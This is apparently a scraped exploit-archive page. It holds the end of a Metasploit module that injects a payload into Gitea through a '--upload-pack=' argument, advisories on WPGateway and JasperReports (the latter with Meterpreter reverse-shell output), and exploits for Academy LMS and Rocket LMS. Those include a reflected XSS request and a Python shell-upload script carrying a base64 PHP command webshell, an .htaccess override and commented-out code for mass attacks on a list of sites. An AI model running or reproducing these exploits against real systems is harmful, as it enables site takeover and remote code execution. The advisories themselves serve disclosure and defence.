/> '_csrf' => get_csrf(res.get_cookies)<br /> },<br /> 'keep_cookies' => true<br /> )<br /> fail_with(Failure::UnexpectedReply, 'Unable to create repo') if res&.code != 302<br /><br /> rescue ::Rex::ConnectionError<br /> return CheckCode::Unknown('Could not connect to the web service')<br /> end<br /><br /> def gitea_migrate_repo<br /> res = send_request_cgi(<br /> 'method' => 'GET',<br /> 'uri' => normalize_uri(target_uri.path, '/repo/migrate'),<br /> 'keep_cookies' => true<br /> )<br /> uri = res&.get_html_document&.at('//svg[@class="svg gitea-gitea"]/ancestor::a/@href')&.text<br /> fail_with(Failure::UnexpectedReply, 'Unable to get Gitea service type') unless uri<br /><br /> svc_type = Rack::Utils.parse_query(URI.parse(uri).query)['service_type']<br /> res = send_request_cgi(<br /> 'method' => 'GET',<br /> 'uri' => normalize_uri(target_uri.path, uri),<br /> 'keep_cookies' => true<br /> )<br /> res = send_request_cgi(<br /> 'method' => 'POST',<br /> 'uri' => uri,<br /> 'vars_post' => {<br /> 'uid' => @uid,<br /> 'service' => svc_type,<br /> 'pull_requests' => 'on',<br /> 'repo_name' => @migrate_repo_name,<br /> '_csrf' => get_csrf(res.get_cookies),<br /> 'auth_token' => rand_text_alphanumeric(6..15),<br /> 'clone_addr' => "http://#{srvhost_addr}:#{srvport}/#{@migrate_repo_path}",<br /> },<br /> 'keep_cookies' => true<br /> )<br /> if res&.code != 302 # possibly triggered by the [migrations] settings<br /> err = res&.get_html_document&.at('//div[contains(@class, flash-error)]/p')&.text<br /> gitea_remove_repo(@repo_name)<br /> cleanup<br /> fail_with(Failure::UnexpectedReply, "Unable to migrate repo: #{err}")<br /> end<br /><br /> rescue ::Rex::ConnectionError<br /> return CheckCode::Unknown('Could not connect to the web service')<br /> end<br /><br /> def on_request_uri(cli, req)<br /> case req.uri<br /> when '/api/v1/version'<br /> send_response(cli, '{"version": "1.16.6"}')<br /> when '/api/v1/settings/api'<br /> data = {<br /> 'max_response_items':50,'default_paging_num':30,<br /> 'default_git_trees_per_page':1000,'default_max_blob_size':10485760<br /> }<br /> send_response(cli, data.to_json)<br /> when "/api/v1/repos/#{@migrate_repo_path}"<br /> data = {<br /> "clone_url": "#{full_uri}#{datastore['username']}/#{@repo_name}",<br /> "owner": { "login": datastore['username'] }<br /> }<br /> send_response(cli, data.to_json)<br /> when "/api/v1/repos/#{@migrate_repo_path}/topics?limit=0&page=1"<br /> send_response(cli, '{"topics":[]}')<br /> when "/api/v1/repos/#{@migrate_repo_path}/pulls?limit=50&page=1&state=all"<br /> data = [<br /> {<br /> "base": {<br /> "ref": "master",<br /> },<br /> "head": {<br /> "ref": "--upload-pack=#{payload.encoded}",<br /> "repo": {<br /> "clone_url": "./",<br /> "owner": { "login": "master" },<br /> }<br /> },<br /> "updated_at": "2001-01-01T05:00:00+01:00",<br /> "user": {}<br /> }<br /> ]<br /> send_response(cli, data.to_json)<br /> end<br /> end<br />end<br /> <br /></code></pre>
<pre><code>Description: Unauthenticated Privilege Escalation<br /><br />Affected Plugin: WPGateway<br /><br />Plugin Slug: wpgateway<br /><br />Plugin Developer: Jack Hopman/WPGateway<br /><br />Affected Versions: <= 3.5<br /><br />CVE ID: CVE-2022-3180<br /><br />CVSS Score: 9.8 (Critical)<br /><br />CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H<br /><br />Fully Patched Version: N/A<br /><br />The WPGateway plugin is a premium plugin tied to the WPGateway cloud service, which offers its users a way to setup and manage WordPress sites from a single dashboard. Part of the plugin functionality exposes a vulnerability that allows unauthenticated attackers to insert a malicious administrator.<br /><br />We obtained a current copy of the plugin on September 9, 2022, and determined that it is vulnerable, at which time we contacted the plugin vendor with our initial disclosure. We have reserved vulnerability identifier CVE-2022-3180 for this issue.<br /><br />As this is an actively exploited zero-day vulnerability, and attackers are already aware of the mechanism required to exploit it, we are releasing this public service announcement (PSA) to all of our users. We are intentionally withholding certain details to prevent further exploitation. As a reminder, an attacker with administrator privileges has effectively achieved a complete site takeover.<br /><br />Indicators of compromise<br /><br />If you are working to determine whether a site has been compromised using this vulnerability, the most common indicator of compromise is a malicious administrator with the username of rangex.<br /><br />If you see this user added to your dashboard, it means that your site has been compromised.<br /><br />Additionally, you can check your site’s access logs for requests to //wp-content/plugins/wpgateway/wpgateway-webservice-new.php?wp_new_credentials=1<br /><br />If these requests are present in your logs, they indicate that your site has been attacked using an exploit targeting this vulnerability, but do not necessarily indicate that it has been successfully compromised.<br /><br />Conclusion<br /><br />In today’s post, we detailed a zero-day vulnerability being actively exploited in the WPGateway plugin.<br /><br />Wordfence Premium, Wordfence Care, and Wordfence Response customers received a firewall rule on September 8, 2022, protecting against this vulnerability, while sites still using the free version of Wordfence will receive the same protection 30 days later, on October 8, 2022.<br /><br />If you have the WPGateway plugin installed, we urge you to remove it immediately until a patch is made available and to check for malicious administrator users in your WordPress dashboard.<br /><br />If you know a friend or colleague who is using this plugin on their site, we highly recommend forwarding this advisory to them to help keep their sites protected, as this is a serious vulnerability that is actively being exploited in the wild. Please help make the WordPress community aware of this issue.<br /><br />If you believe your site has been compromised as a result of this vulnerability or any other vulnerability, we offer Incident Response services via Wordfence Care. If you need your site cleaned immediately, Wordfence Response offers the same service with 24/7/365 availability and a 1-hour response time. Both these products include hands-on support in case you need further assistance.<br /><br />Our investigation is ongoing, and we will provide more information in an additional blog post when it becomes available.<br /><br />Special thanks to Threat Intelligence Lead Chloe Chamberland for spotting this exploit in the wild.<br /><br /></code></pre>
<pre><code>Advisory ID: SYSS-2022-041<br />Product: JasperReports Server<br />Manufacturer: TIBCO Software Inc.<br />Tested Version(s): 8.0.2 Community Edition<br />Vulnerability Type: CWE-502: Deserialization of Untrusted Data<br />Risk Level: High<br />Solution Status: Fixed<br />Manufacturer Notification: 2022-06-10<br />Solution Date: 2022-08-10<br />Public Disclosure: 2022-09-09<br />CVE Reference: None assigned<br />Author of Advisory: Moritz Bechler, SySS GmbH<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Overview:<br /><br />The manufacturer describes the product as follows (see [1]):<br /><br />"TIBCO JasperReports(R) Server is a stand-alone and embeddable<br />reporting server. It provides reporting and analytics that can<br />be embedded into a web or mobile application as well as operate<br />as a central information hub for the enterprise by delivering<br />mission critical information on a real-time or scheduled basis<br />to the browser, mobile device, or email inbox in a variety of<br />file formats."<br /><br />Due to JMX/RMI services performing unsafe deserialization, it is<br />possible to execute arbitrary code and system commands on the<br />server system.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Vulnerability Details:<br /><br />The JasperReports Server web application spawns a non-standard JMX<br />diagnostic server exposed under the RMI name "jasperserver". The relevant<br />configuration is found in WEB-INF/js.diagnostic.properties:<br />------<br />#Diagnostic default remote access configuration<br />diagnostic.usePlatformJMXServer = false<br />diagnostic.port = 10990<br />diagnostic.name = jasperserver<br />diagnostic.rmiHost = localhost<br />------<br /><br />It is also found in WEB-INF/applicationContext-diagnostic.xml:<br />------<br /><!--Bean which create Connector to JMS Servercan be disabled if not Using separate JMX Server--><br /><bean id="jasperJMXServerConnector" class="org.springframework.jmx.support.ConnectorServerFactoryBean" lazy-init="false"><br /> <property name="server" ref="jasperJMXServer"/><br /> <property name="objectName" value="connector:name=rmi"/><br /> <property name="serviceUrl" value="service:jmx:rmi:///jndi/rmi://${diagnostic.rmiHost}:${diagnostic.port}/${diagnostic.name}"/><br /> <property name="environmentMap"><br /> <map><br /> <entry key="jmx.remote.authenticator" value-ref="jMXAuthenticator"/><br /> </map><br /> </property><br /></bean><br />------<br /><br /><br />While the hostname for the RMI bind is specified as localhost, this does,<br />in fact, not set the bind address and both the registry and the<br />(random) object port are reachable over the network. Only the returned<br />reference address is broken, as it points to the local address, but<br />this can be adjusted for exploitation.<br /><br />And while various security patches have implemented type restrictions<br />for the fundamental RMI services (DGC, Registry) and the JMX authentication,<br />the latter is not applied in this case. It is only active if the following<br />property is set: "jmx.remote.rmi.server.credential.types".<br /><br />For a regular JMX server, this is configured by the standard<br />library's JMX ConnectorBootstrap; however, this is not the case for the custom<br />JMX server created through Spring's ConnectorServerFactoryBean.<br /><br />Therefore, the RMIServer.newClient endpoint performs unrestricted,<br />unsafe deserialization and can be exploited using one of the known,<br />published gadget chains (e.g. from ysoserial[5]) in one of the libraries<br />bundled by the server. These allow for execution of arbitrary bytecode and/or<br />system commands on the server.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Proof of Concept (PoC):<br /><br />JasperReports Server (CE) was installed according to the documentation[4]<br />on a Debian 11 system running Tomcat 9.0.43-2~deb11u3 and OpenJDK 11.0.15.<br /><br />After the successful initial setup, a new RMI service can be observed on TCP<br />port 10990:<br /><br />------<br />PORT STATE SERVICE VERSION<br />10990/tcp open java-rmi Java RMI<br />| rmi-dumpregistry:<br />| jasperserver<br />| javax.management.remote.rmi.RMIServerImpl_Stub<br />| @127.0.1.1:39297<br />| extends<br />| java.rmi.server.RemoteStub<br />| extends<br />|_ java.rmi.server.RemoteObject<br />------<br /><br />Using a custom Metasploit module, calls on the exposed RMI object can<br />be made (calling JMX's RMIServer.newClient(Object creds)). The module<br />is capable of identifying known exploitable types on the remote classpath<br />and sending malicious crafted objects. These, when deserialized by the remote<br />RMI server, spawn a Java Meterpreter instance and open a reverse shell.<br /><br />------<br />msf6 exploit(multi/java/rmi_server) ><br />[*] Started reverse TCP handler on 192.168.56.1:4444<br />[*] payload/java/classfile/meterpreter/reverse_tcp<br />[*] Trying bytecode execution<br />[*] Found RMI Registry with 1 registered objects<br />[+] Registry lookup() name argument is filtered<br />[*] Bind access check before deserialization<br />[*] DGC found<br />[+] DGC filters parameter types<br />[*] Found 1 referenced objects, following references<br />[*] Custom object found jasperserver<br />[*] Trying with original host 192.168.56.106 port 39297<br />[*] Method/interface hash -1089742558549201240 method id -1<br />[*] Initial test returned error java.lang.SecurityException<br />[-] Incompatible commons-fileupload<br />[*] Identified 1 attack vector(s), gadgets ["hashdos", "beanutils",<br /> "hibernate", "hibernate-validator", "spring-typeprov", "spring-jta", "rhino"]<br />[*] Skipping gadget hashdos based on config<br />[*] Sending stage (53921 bytes) to 192.168.56.106<br />[...]<br />[*] Waiting for exploit to complete...<br />[*] Have session...<br />[*] Server stopped.<br />[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.106:46828) at 2022-06-09 13:39:40 +0200<br />-------<br /><br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Solution:<br /><br />Disable the JMX server as per documentation, as per section 9.12 of [6].<br />Update to version 8.1.0 which disables the JMX service by default.<br />Do not enable the Diagnostic JMX Server.<br /> <br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Disclosure Timeline:<br /><br />2022-06-08: Vulnerability discovered<br />2022-06-10: Vulnerability reported to manufacturer<br />2022-08-10: Patch released by manufacturer<br />2022-09-09: Public disclosure of vulnerability<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />References:<br /><br />[1] Product website for JasperReports Server<br /> https://community.jaspersoft.com/project/jasperreports-server<br />[2] SySS Security Advisory SYSS-2022-041<br /> https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2022-041.txt<br />[3] SySS Responsible Disclosure Policy<br /> https://www.syss.de/en/responsible-disclosure-policy<br />[4] TIBCO JasperReports Server Community Edition Release Notes<br /> https://community.jaspersoft.com/documentation/tibco-jasperreports-server-community-edition-release-notes/v750/installation-and-basic<br />[5] ysoserial<br /> https://github.com/frohoff/ysoserial/<br />[6] JasperReports Server Administrator Guide<br /> https://docs.tibco.com/pub/js-jrs/8.0.2/doc/pdf/TIB_js-jrs_8.0.0_Admin-Guide.pdf?id=5<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Credits:<br /><br />This security vulnerability was found by Moritz Bechler of SySS GmbH.<br /><br />E-Mail: moritz.bechler@syss.de<br />Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Moritz_Bechler.asc<br />Key ID: 0x768EFE2BB3E53DDA<br />Key Fingerprint: 2C8F F101 9D77 BDE6 465E CCC2 768E FE2B B3E5 3DDA<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Disclaimer:<br /><br />The information provided in this security advisory is provided "as is"<br />and without warranty of any kind. Details of this security advisory may<br />be updated in order to provide as accurate information as possible. The<br />latest version of this security advisory is available on the SySS website.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Copyright:<br /><br />Creative Commons - Attribution (by) - Version 3.0<br />URL: http://creativecommons.org/licenses/by/3.0/deed.en<br /><br /></code></pre>
<pre><code># Exploit Title: Academy Learning Management System 5.7 Shell Upload<br /># Exploit Author: th3d1gger<br /># Vendor Homepage: https://codecanyon.net<br /># Software Link: https://codecanyon.net/item/academy-course-based-learning-management-system/22703468<br /># Version: 5.7<br /># Tested on Ubuntu 18.04<br /><br />Totally wrong architecture for uploading zip files on install addon <br /><br />---Vulnerable Source Code ---<br />$zipped_file_name = $_FILES['addon_zip']['name'];<br /><br /> if (!empty($zipped_file_name)) {<br /> // Create update directory.<br /> $dir = 'uploads/addons';<br /> if (!is_dir($dir))<br /> mkdir($dir, 0777, true);<br /><br /> $path = "uploads/addons/".$zipped_file_name;<br /> if (class_exists('ZipArchive')) {<br /> move_uploaded_file($_FILES['addon_zip']['tmp_name'], $path);<br /> //Unzip uploaded update file and remove zip file.<br /> $zip = new ZipArchive;<br /> $zip->open($path);<br /> $zip->extractTo('uploads/addons');<br /> $zip->close();<br /> unlink($path);<br /> }else{<br /> $this->session->set_flashdata('error_message', get_phrase('your_server_is_unable_to_extract_the_zip_file').'. '.get_phrase('please_enable_the_zip_extension_on_your_server').', '.get_phrase('then_try_again'));<br /> redirect(site_url('admin/addon'), 'refresh');<br /> }<br /><br />---Exploit------<br />get request route "/admin/addon/add" at admin panel.<br /><br />And then for example download "certificate addon" nulled version.<br /><br />in addons config.json file <br />add<br />"""<br /> {<br /> "root_directory" : "uploads/addons/certificate/others/shell.php",<br /> "update_directory" : "uploads/certificates/shell.php"<br /> },<br />"""<br /><br />add your webshell to others folder in addon.<br /><br />click install addon button.<br /><br />And ta daa !<br />->get request https://your-url/uploads/certificates/shell.php<br /></code></pre>
<pre><code># Exploit Title: Rocket LMS - Learning Management System Reflected Cross Site Scripting<br /># Exploit Author: th3d1gger<br /># Vendor Homepage: https://codecanyon.net<br /># Software Link: https://codecanyon.net/item/rocket-lms-learning-management-academy-script/33120735<br /># Version: Version 1.6<br /># Tested on Ubuntu 18.04<br /><br /><br />-------Request-----------<br />GET /search?search=%3Cbody%2Fbody%2Fbody%2FOn%2FOnLoAd%3Dconsole.log%281%29%3E%3C%21-- HTTP/1.1<br />Host: localhost<br />sec-ch-ua: "Chromium";v="103", ".Not/A)Brand";v="99"<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9<br />Upgrade-Insecure-Requests: 1<br />sec-ch-ua-mobile: ?0<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36<br />sec-ch-ua-platform: "Linux"<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-Mode: navigate<br />Sec-Fetch-Dest: empty<br />Referer: http://localhost/search?search=%3Cbody%2Fbody%2Fbody%2FOn%2FOnLoAd%3Dconsole.log%281%29%3E%3C%21--<br />Accept-Encoding: gzip, deflate<br />Accept-Language: en-US,en;q=0.9<br />Cookie: allow=1; XSRF-TOKEN=eyJpdiI6ImN0MTZwSkxBTEF0VGVtTmo4cmdxSUE9PSIsInZhbHVlIjoidlEvSDRITWdRaXpXU0Q1amE1cSsxTUNZc0lSVHdRWVVxaUp1cURrM3JQSGNTTTQxRUVjSWdGbUtPZVBWV3FiRk5yU3VHNzBZTU4rNDA1VDlsS1BHdC9FRExpbjdhakhDUk56d1l1VGxlSjdFSWVuR2ZQZXBDamt1MVVkdHBRTUsiLCJtYWMiOiJhOTY5YzU2MzE3NmRjMWM0NzBkNmVlNWI1NmU5MjExZGRhZGU2NzYwY2Y5M2FmNzI5YjViMTRmNjI5Y2E0NjdiIn0%3D; rocketlms_session=eyJpdiI6Im9YRVkvTVYyQkZqNkVKR05xK3VVVGc9PSIsInZhbHVlIjoiS1plaFpXSVVJVGdiSE9vK3MxbTk2S3FSMmx6T1dnSGduZ3RZZERlc28xbmRrSWpuSStpMml0L2hkdFdXS3NmWnhHdlV1MXNicUI5Q2ErR1cwODdkYXFEbnd6WlVTZVlCbEZOZVg0VjJrc2J0ZFNVMzd6TW8rVHE5QXlkdEpmS1UiLCJtYWMiOiJhMDBiNjhmNTA1ZDM3ODMzNGQ2MDA4YTA5Nzk0ZDlhMTM5NjM1OWEwNGZmOTViNmU2MGE2YmQ2NWQwMGUzYWMwIn0%3D<br />Connection: close<br /><br /></code></pre>
<pre><code># Exploit Title: Rocket LMS - Learning Management System Shell Upload<br /># Exploit Author: th3d1gger<br /># Vendor Homepage: https://codecanyon.net<br /># Software Link: https://codecanyon.net/item/rocket-lms-learning-management-academy-script/33120735<br /># Version: Version 1.6<br /># Tested on Ubuntu 18.04<br /><br />base64 encode your payload<br />after data image write your extension <br />upload<br />-----<br />There is .htaccess restriction on rocket lms public folder upload your own htaccess to avatar folder first.<br /><br />Enjoy!<br /><br /><br />-------Request-----------<br />POST /panel/setting HTTP/1.1<br />Host: localhost<br />Content-Length: 214<br />Cache-Control: max-age=0<br />sec-ch-ua: "Chromium";v="103", ".Not/A)Brand";v="99"<br />Origin: http://localhost<br />Upgrade-Insecure-Requests: 1<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36<br />Content-Type: application/x-www-form-urlencoded<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9<br />sec-ch-ua-mobile: ?0<br />sec-ch-ua-platform: "Linux"<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-Mode: navigate<br />Sec-Fetch-Dest: empty<br />Referer: http://localhost/panel/setting/step/2<br />Accept-Encoding: gzip, deflate<br />Accept-Language: en-US,en;q=0.9<br />Cookie: allow=1; remember_web_59ba36addc2b2f9401580f014c7f58ea4e30989d=eyJpdiI6IlBhNzBxQi96TVJwTm5KdEI0Ry9xUUE9PSIsInZhbHVlIjoiUE80Y2h6WlU2N3FjZDBaMldkZU1pcDg3ZmVLWitZSUxsQVBIc0lHdUV0ZkdtL2JYYzZ0Q2RsL1JSQXhVZWFJZGsrcGlOTGJ5Qk8zWWlTVDVWL3ZlNEY3NFpEc1RaT0NSVS9EL2lFWXQyTEtLQXlFR0RPVjREclI4QkMwdWRQb3hzcEtlZ1ZZanQ0ZDAyYWZOMjNjcWo1anFtSFdRdFYwY2laTlJLbnl2TjBVQWdKTlB6Uk4reWlJUTRNSmkrYkhXU1BJMmxpNU05TngxUklxNEM5azY0bFp4NVg2eHdwT1VSci9Od2RCQklsMD0iLCJtYWMiOiI2NzFjZDkxMDRlYWEyODBmMGUxNDg3YmFmZmQ0M2YwMzhlMmViNTYxYjk3YTZmNTk0YzA1MGFkOGY2YmFkN2I1In0%3D; XSRF-TOKEN=eyJpdiI6IjRqa1JIMXQrd0xuZW1za0FXR0lVbGc9PSIsInZhbHVlIjoidXlybG4rTlRraVpXV1dRSE5EWXcrYnVyZnpYUHRmSmpvQ0tuUUI3WEFDZU5HdWpsbXJBRi9WaStzWXVDNEJLa2UzT3BTSkdobzdPc0dUb0V1TzUyMGdPVHRHY3NNR0x2YlpVT1YxMy9DYXVIMGxERktaZXZtT1pPQUF4Y0N6U0IiLCJtYWMiOiI2MTAyMGJlZmFhNjk2ZWRiOWViYjVlZWNhOWUyYzFmYTJjNjdmYTdmZWNmY2ZhMTFjMTg3NmQwMDAxNjg1OTVjIn0%3D; rocketlms_session=eyJpdiI6Ik1yOGpZZmFGRnJMY1BBYkNBVUhYT1E9PSIsInZhbHVlIjoiOWkrN1JmUHhqc21qTlZqdytPdUJaSnpPQW0ybXNlVGpWLzViVzFpbHpheUF2QUJYRTJNUmpCaC9xZk5CRWg1eGpiVFZ4ejFOOTdLZ3NmNTkrQlhheTBBUGNVVDdPa3IvVWVSeTZ3RndxV2FRdWpWRnVvSHhzY2xKUjMvelB4dTAiLCJtYWMiOiIzNTdlNTNmNGNlMDFlMTU5NWVlOTQ1NjM0YjFjZGU4NWJmMTg5NzIzNmRhMTQxMzc4MDIyZGU2ZDM2N2JiODg2In0%3D<br />Connection: close<br /><br />_token=vILAoLnB2BFEaF35K4kMmwLokzOPLMnryeYXQVzS&step=2&next_step=0&profile_image=data%3Aimage%2FPHP%3Bbase64%2CPD9waHAgJGNtZCA9IHN5c3RlbSgkX0dFVFsnY21kJ10pOwoKZWNobyAkY21kOwo/Pg==<br />&cover_img=%2Fstore%2F995%2F7.jpg<br /><br /><br /><br />Exploit:<br /><br /><br />import time<br />import requests<br />import base64<br />import re<br /><br />import traceback<br />class Rocket:<br /> def __init__(self,ssl,host,port,email,password,file):<br /> self._url_to_upload = "/panel/setting"<br /> self._url_to_login = "/login"<br /> self.host = host<br /> self.port = port<br /> self.ssl = ssl<br /> self.email = email<br /> self.password = password<br /> self.file = file<br /> def get_csrf_token(self,client,URL):<br /> <br /> fromt = client.get(URL) <br /><br /> if 'XSRF-TOKEN' in client.cookies:<br /> <br /> csrftoken = re.findall(r'<input type="hidden" name="_token" value="(.*)"',fromt.text)[0]<br /><br /> return csrftoken<br /><br /> else:<br /> <br /> print("Error while fetching token")<br /> return<br /><br /> def login(self):<br /> client = requests.session()<br /><br /><br /> if self.ssl == True:<br /> ssl= "https://"<br /> else:<br /> ssl= "http://"<br /> URL = str(ssl+self.host+":"+self.port+self._url_to_login)<br /> URL2 = str(ssl+self.host+":"+self.port+self._url_to_upload)<br /> csrftoken = self.get_csrf_token(client,URL)<br /> fromt = client.get(URL) # sets cookie<br /> <br /> login_data = dict(username=self.email, password=self.password, _token=csrftoken, next='/panel')<br /> r = client.post(URL, data=login_data, cookies=client.cookies)<br /> <br /> <br /> self.upload_shell(client,URL2)<br /> self.upload_htaccess(client,URL2)<br /> def upload_shell(self,client,URL):<br /> csrftoken = self.get_csrf_token(client,URL)<br /> with open(self.file,"r") as payload:<br /> to_base64 = payload.read()<br /> <br /> to_base64 = str(to_base64).encode("utf-8")<br /> base64_encoded_data= base64.b64encode(to_base64)<br /> base64_encoded_data = str(base64_encoded_data)[:-1]<br /> base64_encoded_data = str(base64_encoded_data)[2:]<br /> <br /> string = "data:image/php;base64,"+str(base64_encoded_data)<br /> data = dict(_token=csrftoken,step=2,next_step=0,profile_image=string,cover_img="")<br /> r = client.post(URL, data=data, cookies=client.cookies)<br /> print(r.status_code)<br /> if r.status_code == 200:<br /> print("sent and uploaded shell :"+URL+"\n")<br /><br /> else: <br /> print("couldn't upload shell")<br /> <br /><br /> def upload_htaccess(self,client,URL):<br /> csrftoken = self.get_csrf_token(client,URL)<br /> <br /> string = "data:image/.htaccess;base64,UmV3cml0ZUVuZ2luZSBPbgpPcHRpb25zICtJbmRleGVzClJld3JpdGVCYXNlIC8KQWxsb3cgZnJvbSBhbGwKPEZpbGVzTWF0Y2ggIlwuKD9pOnBocCkkIj4KICAgIDxJZk1vZHVsZSAhbW9kX2F1dGh6X2NvcmUuYz4KICAgICAgT3JkZXIgYWxsb3csZGVueQogICAgICBBbGxvdyBmcm9tIGFsbAogICAgPC9JZk1vZHVsZT4KICAgIDxJZk1vZHVsZSBtb2RfYXV0aHpfY29yZS5jPgogICAgICBSZXF1aXJlIGFsbCBncmFudGVkCiAgICA8L0lmTW9kdWxlPgogIDwvRmlsZXNNYXRjaD4="<br /> data = dict(_token=csrftoken,step=2,next_step=0,profile_image=string,cover_img="")<br /> r = client.post(URL, data=data, cookies=client.cookies)<br /> print(r.status_code)<br /> if r.status_code == 200:<br /> print("sent and uploaded htaccess:"+URL+"\n")<br /> print("Go and rename file in filemanager on website")<br /> else: <br /> print("couldn't upload htaccess")<br /><br /> <br /><br />elon = Rocket(True,"localhost","443","student@demo.com","student" ,"/home/mm1nd/Desktop/shell.txt")<br />elon.login()<br /><br /><br /><br /><br />#with dork<br /># try:<br /># with open("sites.txt","r") as urls:<br /># url = urls.readlines()<br /># ssl = True<br /># port = 443<br /># for line in url:<br /> <br /># try:<br /># if "sslyok" in line:<br /># port = 80<br /># ssl = False<br /># line = str(line.rstrip('%0a'))<br /> <br /># print("trying:"+line)<br /># elon = Rocket(ssl,line.rstrip("\n"),str(port),"student@demo.com","student" ,"/home/mm1nd/Desktop/shell.txt")<br /># elon.login()<br /># time.sleep(1) <br /># except Exception:<br /># #traceback.print_exc()<br /># print("atamadim")<br /> <br /># finally:<br /># print("okey")<br /># except Exception:<br /># print("atamadim") <br /><br /><br /></code></pre>